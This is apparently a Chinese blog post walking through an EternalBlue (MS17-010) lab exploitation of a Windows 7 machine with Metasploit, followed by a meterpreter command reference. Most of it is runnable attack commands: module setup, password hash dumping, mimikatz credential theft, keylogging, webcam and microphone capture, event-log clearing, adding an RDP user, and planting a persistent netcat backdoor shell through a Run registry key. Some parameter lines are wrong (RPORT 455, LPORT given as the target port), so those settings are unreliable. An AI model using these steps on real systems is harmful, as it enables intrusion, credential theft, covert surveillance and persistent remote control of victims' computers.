永恒之蓝利用流程及meterpreter的命令使用

微软于2017年3月14日发布MS17-010补丁,修复了“永恒之蓝”攻击的系统漏洞。

永恒之蓝:于 2017 年 4 月 14 日被黑客组织“影子掮客”泄漏

常出现的系统:win7、Windows8、Windows Server 2003

端口:445(文件共享端口)

预防:关闭135/139/445高危端口

准备材料:Kali2021.3、win7系统(开启了445端口)

实验准备:攻击机IP:192.168.1.17,靶机IP:192.168.1.9

步骤一:使用Nmap扫描对方主机开启的端口,使用以下命令

nmap -p 1-1000 -v 192.168.1.9

步骤二:打开msfconsole,使用search查找MS17-010的相关模块

(编号0,exploit/windows/smb/ms17_010_eternalblue,为攻击模块,等下我们会使用这个模块进行攻击,编号3,auxiliary/scanner/smb/smb_ms17_010,为扫描模块,探测靶机是否存在该漏洞)

步骤三:我们使用auxiliary/scanner/smb/smb_ms17_010这个模块先对靶场进行扫描,看是否存在漏洞

第一步:使用use选择模块

use auxiliary/scanner/smb/smb_ms17_010

第二步:查看该模块需要设置什么参数,命令:show options,从中可以看出RHOSTS和RPORT两个参数是需要设置的,这里输入的是靶机的IP和端口地址

第三步:使用set命令设置RHOSTS和RPORT这两个参数

set RHOSTS 192.168.1.9
set RPORT 455

第四步:使用run命令开始运行,出现以下信息则代表有该漏洞

如果出现以下信息代表该系统无法使用永恒之蓝漏洞

步骤四:

第一步:切换为攻击模块(exploit/windows/smb/ms17_010_eternalblue),对其利用“永恒之蓝”的漏洞,先使用back退出到msf6>,输入以下命令进入到攻击模块。

use exploit/windows/smb/ms17_010_eternalblue

第二步:使用show options查看需要配置的信息

第三步:输入以下命令,配置模块信息:

set RHOSTS 192.168.1.9 //设置靶机IP

set LPORT 445 //设置靶机端口

set LHOST 192.168.1.17 //设置本机IP

set LPORT 4444 //设置本机监听端口

show targets //查看可以配置的参数

set target 1 //编号1为win7,靶机系统也是win7

第四步:使用run开启运行,出现meterpreter>则代表入侵成功

步骤五:分享下meterpreter的命令

1、常用命令

sessions -i 进入会话
sessions -k 杀死会话
pwd         查看当前目录
getuid      查看当前用户信息
sysinfo     查看远程主机系统信息
execute     在目标主机上执行命令
hashdump    获取目标主机用户密码hash信息(只要我们能够获取到目标的用户凭证,那么即使目标修补了漏洞,我们还是可以控制目标)
getsystem   提升权限(通过内置的提权组件来尝试获取到系统权限)
shell       切换至传统shell
background  将当前session放入后台
kill        关闭进程
load        加载meterpreter扩展
exit        退出当前shell
arp         显示ARP缓存
getproxy    显示当前代理配置
ifconfig    显示接口
ipconfig    显示接口
netstat     显示网络连接
portfwd     将本地端口转发到远程服务
route       查看和修改路由
getenv      查看环境变量
getprivs    查看权限
pgrep       搜索进程
ps          查看当前运行进程(查有没有杀软,可以通过在线杀软对比确定)!!可以查看进程和位数。
reboot      重启系统
reg         修改注册表
help        查看相关的命令
migrate     进程迁移(主要是防止当前的会话断开,所以尽快迁移到其他稳定的进程当中去,要注意两点:迁移的进程位数要一致,迁移的权限最好一致)
clearev     清除windows中的应用程序日志、系统日志、安全日志

2、文件系统命令

cat           查看文件
cd            改变目录
checksum      校验文件md5或sha1
cp            拷贝文件
download      下载文件
edit          编辑文件
ls            列出文件
mkdir         创建文件夹
mv            移动文件
rm            删除文件
rmdir         删除文件夹
search        查找文件
show_mount    列出所有驱动器
upload        上传文件

3、用户设备命令

enumdesktops   列出所有可访问的桌面和窗口
getdesktop     获取当前桌面
idletime       获取远程系统已运行时间(从上次重新启动开始计算)
keyboard_send  发送击键
keyscan_dump   转储击键缓冲区
keyscan_start  开始捕获击键
keyscan_stop   停止捕获击键
mouse          发送鼠标事件
screenshare    实时观看远程用户的桌面
screenshot     截屏
setdesktop     更改shell当前桌面
uictl          控制用户界面组件
record_mic     记录麦克风一定秒数
webcam_chat    开始视频聊天(有可能因为浏览器问题不成功)
webcam_list    列出网络摄像头
webcam_snap    从指定网络摄像头拍摄
webcam_stream  播放指定网络摄像头的视频流
play           在目标系统播放音频

mimikatz抓取密码
load mimikatz   加载mimikatz模块
help mimikatz   查看帮助
wdigest         获取密码

4、开启远程桌面

run vnc 使用vnc连接远程桌面
run getgui -e 开启远程桌面
run post/windows/manage/enable_rdp 开启远程桌面
run post/windows/manage/enable_rdp USERNAME=test PASSWORD=123456 添加用户
run post/windows/manage/enable_rdp FORWARD=true LPORT=6662   将3389端口转发到6662

5、收集信息

run post/windows/gather/checkvm #是否虚拟机
run post/linux/gather/checkvm #是否虚拟机
run post/windows/gather/forensics/enum_drives #查看分区
run post/windows/gather/enum_applications #获取安装软件信息
run post/windows/gather/dumplinks   #获取最近的文件操作
run post/windows/gather/enum_ie  #获取IE缓存
run post/windows/gather/enum_chrome   #获取Chrome缓存
run post/windows/gather/enum_patches  #补丁信息
run post/windows/gather/enum_domain  #查找域控

6、针对未安装补丁攻击

run post/windows/gather/enum_patches  收集补丁信息
攻击:
msf > use exploit/windows/local/xxxx
msf > set SESSION 2
msf > exploit

7、注册设置nc后门

upload /usr/share/windows-binaries/nc.exe C:\\windows\\system32 #上传nc
reg enumkey -k HKLM\\software\\microsoft\\windows\\currentversion\\run   #枚举run下的key
reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v lltest_nc -d 'C:\windows\system32\nc.exe -Ldp 443 -e cmd.exe' #设置键值
reg queryval -k HKLM\\software\\microsoft\\windows\\currentversion\\Run -v lltest_nc   #查看键值
nc -v 192.168.159.144 443  #攻击者连接nc后门

 

  • 5
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
永恒之蓝漏洞的复现流程大致如下: 1. 首先,你需要准备两台机器,一台是攻击机(Linux kali),另一台是靶机(Windows 2008R2)。 2. 打开Metasploit框架,可以使用命令`msfconsole`。 3. 在Metasploit框架中,使用`search ms17_010`命令搜索永恒之蓝漏洞的相关代码。你会找到两个工具,其中`auxiliary/scanner/smb/smb_ms17_010`是用于扫描漏洞的模块,`exploit/windows/smb/ms17_010_eternalblue`是用于攻击的代码。一般情况下,你需要先使用扫描模块,如果显示存在漏洞,再使用攻击代码进行攻击。 4. 配置攻击目标IP,使用命令`use exploit/windows/smb/ms17_010_eternalblue`选择攻击模块。 5. 接下来,你需要使用该模块对靶机服务器进行攻击。使用命令`set RHOSTS <靶机IP>`来配置目标IP。 6. 最后,执行攻击命令,例如使用`exploit`命令开始攻击。 需要注意的是,复现永恒之蓝漏洞属于安全研究领域,只应在合法的环境下进行,并遵守相关法律法规。在实际环境中,应该始终保持系统和软件的更新,以免存在已知漏洞。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *2* *3* [永恒之蓝漏洞复现](https://blog.csdn.net/weixin_39096432/article/details/115422428)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 100%"] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值